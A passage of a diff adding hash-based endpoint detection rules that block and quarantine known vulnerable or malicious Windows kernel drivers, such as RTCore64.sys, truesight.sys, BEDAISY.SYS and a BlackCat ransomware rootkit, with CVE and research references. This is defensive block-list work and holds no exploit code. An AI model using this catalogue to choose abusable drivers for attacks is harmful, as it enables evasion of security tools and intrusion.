+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a709f252-8b8d-5957-87ae-683fb428ea13",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810291Z",
+ "creation_date": "2026-03-23T11:45:31.810293Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810299Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7ae9ab9a8092590c8413d4cff96fb5e78a0e6070432f0c103adeb01f39bcd8ed",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a70d178e-add3-55ad-be4e-ac75e0d28a55",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461126Z",
+ "creation_date": "2026-03-23T11:45:30.461129Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461138Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bbbeb5020b58e6942ec7dec0d1d518e95fc12ddae43f54ef0829d3393c6afd63",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a725f206-78df-5930-a437-624a4df1ffd8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826991Z",
+ "creation_date": "2026-03-23T11:45:31.826993Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826999Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b1af547bbae57877b477886dd5b9d8aacbf529cba83270abe16c93d05b823c9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a72d9bed-cf95-5fe0-9a47-97d9b9e094b4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146831Z",
+ "creation_date": "2026-03-23T11:45:31.146833Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146838Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd6fa2dbddc71b076b718f6d1eb834e6562921a28eab26d9e36f555170688b75",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a737f5d9-0dcc-5a27-bbcb-d9429ed52dfd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156500Z",
+ "creation_date": "2026-03-23T11:45:31.156502Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156508Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec80b7453e9df01c251dea86942376db15570f0de1219a6bd04a3162599a967e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a7603904-18f0-51b7-9867-642994aebdf1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824111Z",
+ "creation_date": "2026-03-23T11:45:31.824114Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824122Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "69a48dd48d2e47a01261192b19aa99687d493e78357dac87830da7cc5f8df708",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a77296d0-3e6c-55b8-af7a-01e5fb885e37",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983334Z",
+ "creation_date": "2026-03-23T11:45:29.983336Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983342Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2b60228db4f3092063e115537b5731ef3487ecf55c036e812605c5149071332c",
+ "comment": "Vulnerable Kernel Driver (aka dcr.sys) [https://www.loldrivers.io/drivers/b1dd91b1-9ba3-4d68-a2d1-919039e18430/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a7742db5-a572-5441-8e43-f31456c7f420",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985557Z",
+ "creation_date": "2026-03-23T11:45:29.985559Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985565Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cb25a5125fb353496b59b910263209f273f3552d",
+ "comment": "Malicious BlackCat/ALPHV Ransomware Rootkit (aka fgme.sys, ktes.sys, kt2.sys and ktgn.sys) [https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html] [file SHA1]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a791ffd5-0b66-52ae-a465-090ac8ae6dd6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981384Z",
+ "creation_date": "2026-03-23T11:45:29.981386Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981392Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d2e843d9729da9b19d6085edf69b90b057c890a74142f5202707057ee9c0b568",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a79b2915-b4fd-534d-868f-bb6a4b70f332",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457535Z",
+ "creation_date": "2026-03-23T11:45:30.457539Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457547Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "442c18aeb09556bb779b21185c4f7e152b892410429c123c86fc209a802bff3c",
+ "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a79e5c19-33bd-503c-b13c-b27330537098",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459489Z",
+ "creation_date": "2026-03-23T11:45:30.459492Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459501Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62b14bb308c99132d90646e85bc7d6eb593f38e225c8232f69f24b74a019c176",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a7a17348-530a-5900-aa8a-6e6992c2412a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146359Z",
+ "creation_date": "2026-03-23T11:45:32.146361Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146367Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff5dbdcf6d7ae5d97b6f3ef412df0b977ba4a844c45b30ca78c0eeb2653d69a8",
+ "comment": "Vulnerable Kernel Driver (aka wsftprm.sys) [https://www.loldrivers.io/drivers/30e8d598-2c60-49e4-953b-a6f620da1371/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a7a80b46-d090-5deb-948b-cf031254524b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144258Z",
+ "creation_date": "2026-03-23T11:45:32.144261Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144267Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dee8dbe00a809e5ecdbea898393dd9ecd32fa0a0de80463cc2b903dcdec2cffe",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a7b429bb-0cc9-5a12-b399-9a585519126c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483275Z",
+ "creation_date": "2026-03-23T11:45:31.483279Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483289Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d408df99fafdede69913c4f2067042c6c8b735f32c7d344f3f3e1228ce950bad",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a7b52ca2-95e0-59de-8335-0e5790af6c35",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827143Z",
+ "creation_date": "2026-03-23T11:45:30.827145Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827150Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "afd675062e521b9a03c4a9ba2007096355f38c6206f41861bd78e94e39b286cf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a7bbf863-9e00-50d9-8f83-058aa8a3f037",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472980Z",
+ "creation_date": "2026-03-23T11:45:31.472983Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472991Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eae3d11d5523aa08c4c75585e30cb93a7ef78bdc11b6570045a957c601a8b680",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a7bfcd28-0943-5fd8-8a24-9b89516f0e4e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977207Z",
+ "creation_date": "2026-03-23T11:45:29.977209Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977214Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d4e7335a177e47688d68ad89940c272f82728c882623f1630e7fd2e03e16f003",
+ "comment": "ASUS vulnerable VGA Kernel Mode Driver (aka EIO.sys) [https://www.loldrivers.io/drivers/f654ad84-c61d-477c-a0b2-d153b927dfcc/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a7efc63e-5c7d-5535-923e-7cbb7ee6a290",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488890Z",
+ "creation_date": "2026-03-23T11:45:31.488892Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488898Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cc9cb071af476c8e92b2e90c2bd8233d3c3254bc540ed9c275829ecc0a5e4849",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a7ff1038-d44d-5daa-a6ae-ad15a00446f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616649Z",
+ "creation_date": "2026-03-23T11:45:29.616652Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616658Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "36aafa127736c7226c50061ea065f71e14f64ec60321f705bc52686d24117e0d",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a8003130-e7ba-5d23-9a7c-755655482c58",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604187Z",
+ "creation_date": "2026-03-23T11:45:29.604189Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604194Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fc7d726e0e803bb38c0f9e910d91970c3dd7444ace1c071381e2e06939616205",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a8018a8a-f1f4-592a-b20c-f91836c9ab99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622456Z",
+ "creation_date": "2026-03-23T11:45:29.622458Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622464Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65025741ecd0ef516da01319b42c2d96e13cb8d78de53fb7e39cd53ea6d58c75",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a801c26e-8c79-5a67-bd06-0c92d14426eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481262Z",
+ "creation_date": "2026-03-23T11:45:31.481266Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481276Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f25ae02387ffdff6c0ee34448e1919ca9ba6558babcee6074f97d7f42ffbc4f3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a80bf6c4-a8be-55a3-a679-568cdb1be077",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
